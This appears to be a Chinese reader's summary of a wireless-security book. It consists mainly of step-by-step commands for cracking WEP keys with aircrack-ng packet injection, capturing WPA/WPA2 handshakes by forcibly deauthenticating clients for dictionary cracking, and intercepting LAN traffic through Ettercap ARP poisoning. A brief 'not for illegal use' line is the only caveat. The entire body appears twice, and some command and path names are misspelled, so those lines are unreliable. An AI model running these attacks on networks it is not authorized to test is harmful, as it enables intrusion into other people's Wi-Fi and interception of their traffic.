无线安全攻防实战
书本没有过多的理论,直奔主题,全是实战经验,比较不错!(每篇都能独立成章,但有很多重复,有点啰嗦)
看了前八章,简单总结一下(提高无线安全防范意识,请勿用于非法用途)
一.wep(不安全,很容易破解,只有拦截到足够多的数据包,就可以破解)
1.步骤如下;
<1>linux环境中安装bt4,安装之前确保bt4支持你的无线网卡芯片
<2>开启wicd管理器,方法:/etc/init.d/wicd start
<3>开启监控网卡接口airmon-ng start wlan0 6 //在6频道开启网卡监控,wlan0是你的
网卡代号,开启后会提示monitor为mon0
<4>airodump-ng -w filename --channel 6 mon0 用监控模式mon0在6频道抓包并写入 你 自己指定的文件名中
<5>aireplay-ng -3 -b ap's mac -h client's mac -x 1024 mon0
arprequest注入攻击攻击,ap's mac 监控到的无线路由的mac地址,client's mac 监控到的客户端的mac地址,1024指的是每秒发送的数据包的数量,这种方式可以有效的提高抓包数量.
<6>airorack-ng -x -f 2 filename.cap
破解抓到的cap文件,得到密码(ivs最好在1W以上)
<7>无客端chopchop攻击略
二.wpa&wpa2(加密算法更为高级,无法通过足够多的数据包来破解,需要监控到客户端的握手信息,然后配合字典进行破解,难度较高,如果没有好的字典加上密码复杂的话,破解时间可能会以年来计算)
1.步骤如下:
<1>airmon-ng start wlan0 //激活网卡的monitor模式
<2>airodump-ng -w filename --channel 6 mon0 //开始嗅探并抓包
<3>aireplay-ng 0 10 -a ap's mac mon0
进行Deauthenticate验证攻击,迫使ap重新与客户端进行握手验证,从而使截握手验证数据包成为可能(经测试并非一下就成功,要攻击多次)
<4>截获到wpa握手数据包时,右上角会有提示,这时ctrl+c中止airodump-ng
<5>zcat /pentest/password/dictionaries/wordlist.txt.Z>password.txt(bt4中好像是在/pendtest/passwords/名字忘了)
解压缩bt4自带的字典文件,并命名为password
cp /pentest/password/dictionaries/password/ /root
将文件拷到 root目录下面
<6>aircrack-ng -w password.txt filename.cap
开始破解,破解时间取决于你机器的配置,字典的包含程度等(书上说有些网站提供的字典文件大小甚至达到300G,猛!)
三.进阶
1.MITM攻击(a和b在通信,我告诉a我是b,然后告诉b我是a,截获双方通信包)
步骤如下:
<1>进入BT4打开EtterCap,选择自己工作的无线网卡
<2>主机扫描,HostList会列出局域网内的其他主机
<3>target->select target 填入网关和你要截获的主机ip,欺骗双方
<4>arp posion
<5>wirshark抓包,找到你想要的东西.
2.拒绝服务攻击(dos攻击)
待续..
书本没有过多的理论,直奔主题,全是实战经验,比较不错!(每篇都能独立成章,但有很多重复,有点啰嗦)
看了前八章,简单总结一下(提高无线安全防范意识,请勿用于非法用途)
一.wep(不安全,很容易破解,只有拦截到足够多的数据包,就可以破解)
1.步骤如下;
<1>linux环境中安装bt4,安装之前确保bt4支持你的无线网卡芯片
<2>开启wicd管理器,方法:/etc/init.d/wicd start
<3>开启监控网卡接口airmon-ng start wlan0 6 //在6频道开启网卡监控,wlan0是你的
网卡代号,开启后会提示monitor为mon0
<4>airodump-ng -w filename --channel 6 mon0 用监控模式mon0在6频道抓包并写入 你 自己指定的文件名中
<5>aireplay-ng -3 -b ap's mac -h client's mac -x 1024 mon0
arprequest注入攻击攻击,ap's mac 监控到的无线路由的mac地址,client's mac 监控到的客户端的mac地址,1024指的是每秒发送的数据包的数量,这种方式可以有效的提高抓包数量.
<6>airorack-ng -x -f 2 filename.cap
破解抓到的cap文件,得到密码(ivs最好在1W以上)
<7>无客端chopchop攻击略
二.wpa&wpa2(加密算法更为高级,无法通过足够多的数据包来破解,需要监控到客户端的握手信息,然后配合字典进行破解,难度较高,如果没有好的字典加上密码复杂的话,破解时间可能会以年来计算)
1.步骤如下:
<1>airmon-ng start wlan0 //激活网卡的monitor模式
<2>airodump-ng -w filename --channel 6 mon0 //开始嗅探并抓包
<3>aireplay-ng 0 10 -a ap's mac mon0
进行Deauthenticate验证攻击,迫使ap重新与客户端进行握手验证,从而使截握手验证数据包成为可能(经测试并非一下就成功,要攻击多次)
<4>截获到wpa握手数据包时,右上角会有提示,这时ctrl+c中止airodump-ng
<5>zcat /pentest/password/dictionaries/wordlist.txt.Z>password.txt(bt4中好像是在/pendtest/passwords/名字忘了)
解压缩bt4自带的字典文件,并命名为password
cp /pentest/password/dictionaries/password/ /root
将文件拷到 root目录下面
<6>aircrack-ng -w password.txt filename.cap
开始破解,破解时间取决于你机器的配置,字典的包含程度等(书上说有些网站提供的字典文件大小甚至达到300G,猛!)
三.进阶
1.MITM攻击(a和b在通信,我告诉a我是b,然后告诉b我是a,截获双方通信包)
步骤如下:
<1>进入BT4打开EtterCap,选择自己工作的无线网卡
<2>主机扫描,HostList会列出局域网内的其他主机
<3>target->select target 填入网关和你要截获的主机ip,欺骗双方
<4>arp posion
<5>wirshark抓包,找到你想要的东西.
2.拒绝服务攻击(dos攻击)
待续..